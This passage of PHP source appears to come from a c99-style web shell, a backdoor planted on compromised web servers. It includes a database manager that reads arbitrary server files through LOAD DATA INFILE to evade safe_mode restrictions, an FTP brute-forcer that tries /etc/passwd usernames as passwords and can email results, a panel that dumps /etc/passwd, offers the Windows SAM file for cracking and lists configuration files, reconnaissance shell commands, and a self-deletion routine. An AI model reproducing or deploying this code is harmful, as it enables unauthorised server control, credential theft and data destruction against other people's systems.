  1489.           if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
  1490.           if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
  1491.           else {echo "&nbsp;";}
  1492.         }
  1493.         if ($i == 0) {echo "empty";}
  1494.         echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
  1495.         echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>";
  1496.         echo "<tr>";
  1497.         echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
  1498.         for ($i=0;$i<mysql_num_fields($result);$i++) {
  1499.          $v = mysql_field_name($result,$i);
  1500.          if ($e[0] == "a") {$s = "d"; $m = "asc";}
  1501.          else {$s = "a"; $m = "desc";}
  1502.          echo "<td>";
  1503.           if (empty($e[0])) {$e[0] = "a";}
  1504.           if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
  1505.           else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
  1506.           echo "</td>";
  1507.         }
  1508.       echo "<td><font color=\"green\"><b>Action</b></font></td>";
  1509.       echo "</tr>";
  1510.       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
  1511.        echo "<tr>";
  1512.        $w = "";
  1513.        $i = 0;
  1514.        foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
  1515.        if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
  1516.        echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
  1517.        $i = 0;
  1518.        foreach ($row as $k=>$v)
  1519.        {
  1520.         $v = htmlspecialchars($v);
  1521.         if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
  1522.         echo "<td>".$v."</td>";
  1523.         $i++;
  1524.        }
  1525.        echo "<td>";
  1526.        echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;";
  1527.        echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;";
  1528.        echo "</td>";
  1529.        echo "</tr>";
  1530.       }
  1531.       mysql_free_result($result);
  1532.       echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
  1533.       echo "<option value=\"\">With selected:</option>";
  1534.       echo "<option value=\"deleterow\">Delete</option>";
  1535.       echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
  1536.      }
  1537.     }
  1538.     else {
  1539.      $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
  1540.      if (!$result) {echo mysql_smarterror();}
  1541.      else
  1542.      {
  1543.       echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
  1544.       $i = 0;
  1545.       $tsize = $trows = 0;
  1546.       while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
  1547.       {
  1548.        $tsize += $row["Data_length"];
  1549.        $trows += $row["Rows"];
  1550.        $size = view_size($row["Data_length"]);
  1551.        echo "<tr>";
  1552.        echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
  1553.        echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
  1554.        echo "<td>".$row["Rows"]."</td>";
  1555.        echo "<td>".$row["Type"]."</td>";
  1556.        echo "<td>".$row["Create_time"]."</td>";
  1557.        echo "<td>".$row["Update_time"]."</td>";
  1558.        echo "<td>".$size."</td>";
  1559.        echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>";
  1560.        echo "</tr>";
  1561.        $i++;
  1562.       }
  1563.       echo "<tr bgcolor=\"000000\">";
  1564.       echo "<td><center><b>+</b></center></td>";
  1565.       echo "<td><center><b>".$i." table(s)</b></center></td>";
  1566.       echo "<td><b>".$trows."</b></td>";
  1567.       echo "<td>".$row[1]."</td>";
  1568.       echo "<td>".$row[10]."</td>";
  1569.       echo "<td>".$row[11]."</td>";
  1570.       echo "<td><b>".view_size($tsize)."</b></td>";
  1571.       echo "<td></td>";
  1572.       echo "</tr>";
  1573.       echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
  1574.       echo "<option value=\"\">With selected:</option>";
  1575.       echo "<option value=\"tbldrop\">Drop</option>";
  1576.       echo "<option value=\"tblempty\">Empty</option>";
  1577.       echo "<option value=\"tbldump\">Dump</option>";
  1578.       echo "<option value=\"tblcheck\">Check table</option>";
  1579.       echo "<option value=\"tbloptimize\">Optimize table</option>";
  1580.       echo "<option value=\"tblrepair\">Repair table</option>";
  1581.       echo "<option value=\"tblanalyze\">Analyze table</option>";
  1582.       echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
  1583.       mysql_free_result($result);
  1584.      }
  1585.     }
  1586.    }
  1587.    }
  1588.   }
  1589.   else {
  1590.    $acts = array("","newdb","serverstatus","servervars","processes","getfile");
  1591.    if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
  1592.   if (!empty($sql_act)) {
  1593.    echo "<hr size=\"1\" noshade>";
  1594.     if ($sql_act == "newdb") {
  1595.      echo "<b>";
  1596.      if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
  1597.      else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
  1598.     }
  1599.     if ($sql_act == "serverstatus") {
  1600.      $result = mysql_query("SHOW STATUS", $sql_sock);
  1601.      echo "<center><b>Server-status variables:</b><br><br>";
  1602.      echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
  1603.      while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
  1604.      echo "</table></center>";
  1605.      mysql_free_result($result);
  1606.     }
  1607.     if ($sql_act == "servervars") {
  1608.      $result = mysql_query("SHOW VARIABLES", $sql_sock);
  1609.      echo "<center><b>Server variables:</b><br><br>";
  1610.      echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
  1611.      while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
  1612.      echo "</table>";
  1613.      mysql_free_result($result);
  1614.     }
  1615.     if ($sql_act == "processes") {
  1616.      if (!empty($kill)) {
  1617.        $query = "KILL ".$kill.";";
  1618.        $result = mysql_query($query, $sql_sock);
  1619.        echo "<b>Process #".$kill." was killed.</b>";
  1620.      }
  1621.      $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
  1622.      echo "<center><b>Processes:</b><br><br>";
  1623.      echo "<TABLE cellSpacing=0 cellPadding=2 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
  1624.      while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
  1625.      echo "</table>";
  1626.      mysql_free_result($result);
  1627.     }
  1628.     if ($sql_act == "getfile")
  1629.     {
  1630.      $tmpdb = $sql_login."_tmpdb";
  1631.      $select = mysql_select_db($tmpdb);
  1632.      if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
  1633.      if ($select)
  1634.      {
  1635.       $created = FALSE;
  1636.       mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
  1637.       mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
  1638.       $result = mysql_query("SELECT * FROM tmp_file;");
  1639.       if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
  1640.       else
  1641.       {
  1642.        for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
  1643.       $f = "";
  1644.       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
  1645.       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
  1646.        else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
  1647.        mysql_free_result($result);
  1648.        mysql_query("DROP TABLE tmp_file;");
  1649.       }
  1650.      }
  1651.      mysql_drop_db($tmpdb); //comment it if you want to leave database
  1652.     }
  1653.    }
  1654.   }
  1655. }
  1656. echo "</td></tr></table>";
  1657. if ($sql_sock) {
  1658.   $affected = @mysql_affected_rows($sql_sock);
  1659.   if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
  1660.  echo "<tr><td><center><b>Affected rows : ".$affected."</center></td></tr>";
  1661. }
  1662. echo "</table>";
  1663. }
  1664. //End of SQL Manager
  1665. if ($act == "ftpquickbrute") {
  1666. echo "<center><table><tr><td class=barheader colspan=2>";
  1667. echo ".: Ftp Quick Brute :.</td></tr>";
  1668. echo "<tr><td>";
  1669. if ($win) {echo "Couldn't run on Windows!";}
  1670. else {
  1671.   function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) {
  1672.     if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
  1673.     else {$TRUE = TRUE;}
  1674.     if ($TRUE) {
  1675.       $sock = @ftp_connect($host,$port,$timeout);
  1676.       if (@ftp_login($sock,$login,$pass)) {
  1677.         echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
  1678.         ob_flush();
  1679.         return TRUE;
  1680.       }
  1681.     }
  1682.   }
  1683.   if (!empty($submit)) {
  1684.     if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
  1685.     $fp = fopen("/etc/passwd","r");
  1686.     if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
  1687.     else {
  1688.       if ($fqb_logging) {
  1689.         if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
  1690.         else {$fqb_logfp = FALSE;}
  1691.         $fqb_log = "FTP Quick Brute (".$sh_name.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
  1692.         if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
  1693.       }
  1694.       ob_flush();
  1695.       $i = $success = 0;
  1696.       $ftpquick_st = getmicrotime();
  1697.       while(!feof($fp)) {
  1698.         $str = explode(":",fgets($fp,2048));
  1699.         if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) {
  1700.           echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
  1701.           $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
  1702.           if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
  1703.           $success++;
  1704.           ob_flush();
  1705.         }
  1706.         if ($i > $fqb_lenght) {break;}
  1707.         $i++;
  1708.       }
  1709.       if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
  1710.       $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
  1711.       echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
  1712.       $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
  1713.       if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
  1714.       if ($fqb_logemail) {@mail($fqb_logemail,"".$sh_name." report",$fqb_log);}
  1715.       fclose($fqb_logfp);
  1716.     }
  1717.   }
  1718.   else {
  1719.     $logfile = $tmpdir_logs."yx29sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
  1720.     $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
  1721.     echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\">".
  1722.          "Read first:</td><td><input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"></td></tr>".
  1723.          "<tr><td></td><td><input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"> Users only with shell</td></tr>".
  1724.          "<tr><td></td><td><input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked>Logging</td></tr>".
  1725.          "<tr><td>Logging to file:</td><td><input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"></td></tr>".
  1726.          "<tr><td>Logging to e-mail:</td><td><input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"></td></tr>".
  1727.          "<tr><td colspan=2><input type=submit name=submit value=\"Brute\"></form>";
  1728.   }
  1729.   echo "</td></tr></table></center>";
  1730. }
  1731. }
  1732. if ($act == "d") {
  1733. if (!is_dir($d)) { echo "<center><b>$d is a not a Directory!</b></center>"; }
  1734. else {
  1735.   echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
  1736.   if (!$win) {
  1737.    echo "<tr><td><b>Owner/Group</b></td><td> ";
  1738.    $ow = posix_getpwuid(fileowner($d));
  1739.    $gr = posix_getgrgid(filegroup($d));
  1740.    $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
  1741.   }
  1742.   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table>";
  1743. }
  1744. }
  1745. if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();}
  1746. if ($act == "security") {
  1747.   echo "<div class=barheader>.: Server Security Information :.</div>".
  1748.        "<table>".
  1749.        "<tr><td>Open Base Dir</td><td>".$hopenbasedir."</td></tr>";
  1750.   echo "<td>Password File</td><td>";
  1751.   if (!$win) {
  1752.     if ($nixpasswd) {
  1753.       if ($nixpasswd == 1) {$nixpasswd = 0;}
  1754.       echo "*nix /etc/passwd:<br>";
  1755.       if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
  1756.       if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
  1757.       echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
  1758.       $i = $nixpwd_s;
  1759.       while ($i < $nixpwd_e) {
  1760.        $uid = posix_getpwuid($i);
  1761.        if ($uid) {
  1762.          $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
  1763.           echo join(":",$uid)."<br>";
  1764.         }
  1765.         $i++;
  1766.       }
  1767.     }
  1768.     else {echo "<a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a>";}
  1769.   }
  1770.   else {
  1771.     $v = $_SERVER["WINDIR"]."\repair\sam";
  1772.     if (file_get_contents($v)) {echo "<td colspan=2><div class=yxerrmsg>You can't crack Windows passwords(".$v.")</div></td></tr>"; }
  1773.     else {echo "You can crack Windows passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ?.</td></tr>";}
  1774.   }
  1775.   echo "</td></tr>";
  1776.   echo "<tr><td>Config Files</td><td>";
  1777.   if (!$win) {
  1778.     $v = array(
  1779.         array("User Domains","/etc/userdomains"),
  1780.         array("Cpanel Config","/var/cpanel/accounting.log"),
  1781.         array("Apache Config","/usr/local/apache/conf/httpd.conf"),
  1782.         array("Apache Config","/etc/httpd.conf"),
  1783.         array("Syslog Config","/etc/syslog.conf"),
  1784.         array("Message of The Day","/etc/motd"),
  1785.         array("Hosts","/etc/hosts")
  1786.     );
  1787.     $sep = "/";
  1788.   }
  1789.   else {
  1790.     $windir = $_SERVER["WINDIR"];
  1791.     $etcdir = $windir . "\system32\drivers\etc\\";
  1792.     $v = array(
  1793.         array("Hosts",$etcdir."hosts"),
  1794.         array("Local Network Map",$etcdir."networks"),
  1795.         array("LM Hosts",$etcdir."lmhosts.sam"),
  1796.     );
  1797.     $sep = "\\";
  1798.   }
  1799.   foreach ($v as $sec_arr) {
  1800.     $sec_f = substr(strrchr($sec_arr[1], $sep), 1);
  1801.     $sec_d = rtrim($sec_arr[1],$sec_f);
  1802.     $sec_full = $sec_d.$sec_f;
  1803.     $sec_d = rtrim($sec_d,$sep);
  1804.     if (file_get_contents($sec_full)) {
  1805.       echo " [ <a href=\"".$surl."act=f&f=$sec_f&d=".urlencode($sec_d)."&ft=txt\"><u><b>".$sec_arr[0]."</b></u></a> ] ";
  1806.     }
  1807.   }
  1808.   echo "</td></tr>";
  1809.  
  1810.   function displaysecinfo($name,$value) {
  1811.     if (!empty($value)) {
  1812.       echo "<tr><td>".$name."</td><td><pre>".wordwrap($value,100)."</pre></td></tr>";
  1813.     }
  1814.   }
  1815.   if (!$win) {
  1816.     displaysecinfo("OS Version",myshellexec("cat /proc/version"));
  1817.     displaysecinfo("Kernel Version",myshellexec("sysctl -a | grep version"));
  1818.     displaysecinfo("Distrib Name",myshellexec("cat /etc/issue.net"));
  1819.     displaysecinfo("Distrib Name (2)",myshellexec("cat /etc/*-realise"));
  1820.     displaysecinfo("CPU Info",myshellexec("cat /proc/cpuinfo"));
  1821.     displaysecinfo("RAM",myshellexec("free -m"));
  1822.     displaysecinfo("HDD Space",myshellexec("df -h"));
  1823.     displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
  1824.     displaysecinfo("Mount Options",myshellexec("cat /etc/fstab"));
  1825.     displaysecinfo("cURL installed?",myshellexec("which curl"));
  1826.     displaysecinfo("lynx installed?",myshellexec("which lynx"));
  1827.     displaysecinfo("links installed?",myshellexec("which links"));
  1828.     displaysecinfo("fetch installed?",myshellexec("which fetch"));
  1829.     displaysecinfo("GET installed?",myshellexec("which GET"));
  1830.     displaysecinfo("perl installed?",myshellexec("which perl"));
  1831.     displaysecinfo("Where is Apache?",myshellexec("whereis apache"));
  1832.     displaysecinfo("Where is perl?",myshellexec("whereis perl"));
  1833.     displaysecinfo("Locate proftpd.conf",myshellexec("locate proftpd.conf"));
  1834.     displaysecinfo("Locate httpd.conf",myshellexec("locate httpd.conf"));
  1835.     displaysecinfo("Locate my.conf",myshellexec("locate my.conf"));
  1836.     displaysecinfo("Locate psybnc.conf",myshellexec("locate psybnc.conf"));
  1837.   }
  1838.   else {
  1839.     displaysecinfo("OS Version",myshellexec("ver"));
  1840.     displaysecinfo("Account Settings",myshellexec("net accounts"));
  1841.   }
  1842.   echo "</table>\n";
  1843. }
  1844. if ($act == "mkfile") {
  1845. if ($mkfile != $d) {
  1846.   if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object already exists!";}
  1847.   elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied!";}
  1848.   else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
  1849. }
  1850. else {$act = $dspact = "ls";}
  1851. }
  1852. if ($act == "encoder") {
  1853. echo "<script language=\"javascript\">function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script>".
  1854.      "<form name=\"encoder\" action=\"".$surl."\" method=POST>".
  1855.      "<input type=hidden name=act value=encoder>".
  1856.      "<center><table class=contents>".
  1857.      "<tr><td colspan=4 class=barheader>.: Encoder :.</td>".
  1858.      "<tr><td colspan=2>Input:</td><td><textarea name=\"encoder_input\" id=\"input\" cols=70 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br>".
  1859.      "<input type=submit value=\"calculate\"></td></tr>".
  1860.      "<tr><td rowspan=4>Hashes:</td>";
  1861. foreach(array("md5","crypt","sha1","crc32") as $v) {
  1862.   echo "<td>".$v.":</td><td><input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly></td></tr><tr>";
  1863. }
  1864. echo "</tr>".
  1865.      "<tr><td rowspan=2>Url:</td>".
  1866.      "<td>urlencode:</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly></td></tr>".
  1867.      "<tr><td>urldecode:</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly></td></tr>".
  1868.      "<tr><td rowspan=2>Base64:</td>".
  1869.      "<td>base64_encode:</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></td></tr>".
  1870.      "<tr><td>base64_decode:</td><td>";
  1871. if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"Failed!\" disabled readonly>";}
  1872. else {
  1873.   $debase64 = base64_decode($encoder_input);
  1874.   $debase64 = str_replace("\0","[0]",$debase64);
  1875.   $a = explode("\r\n",$debase64);
  1876.   $rows = count($a);
  1877.   $debase64 = htmlspecialchars($debase64);
  1878.   if ($rows == 1) { echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>"; }
  1879.   else { $rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>"; }
  1880.   echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\">[Send to input]</a>";
  1881. }
  1882. echo "</td></tr>".
  1883.      "<tr><td>Base convertations:</td><td>dec2hex</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
  1884. $c = strlen($encoder_input);
  1885. for($i=0;$i<$c;$i++) {
  1886.  $hex = dechex(ord($encoder_input[$i]));
  1887.  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
  1888.  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
  1889. }
  1890. echo "\" readonly></td></tr></table></center></form>";
  1891. }
  1892. if ($act == "fsbuff") {
  1893.   $arr_copy = $sess_data["copy"];
  1894.   $arr_cut = $sess_data["cut"];
  1895.   $arr = array_merge($arr_copy,$arr_cut);
  1896.   if (count($arr) == 0) {echo "<h2><center>Buffer is empty!</center></h2>";}
  1897.   else {
  1898.     $yx_infohead = "File-System Buffer";
  1899.     $ls_arr = $arr;
  1900.     $disp_fullpath = TRUE;
  1901.     $act = "ls";
  1902.   }
  1903. }
  1904. if ($act == "selfremove") {
  1905.   if (($submit == $rndcode) and ($submit != "")) {
  1906.     if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using ".$sh_name."!"; c99shexit(); }
  1907.     else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
  1908.   }
  1909.   else {
  1910.     if (!empty($rndcode)) {echo "<b>Error: incorrect confirmation!</b>";}
  1911.     $rnd = rand(0,9).rand(0,9).rand(0,9);
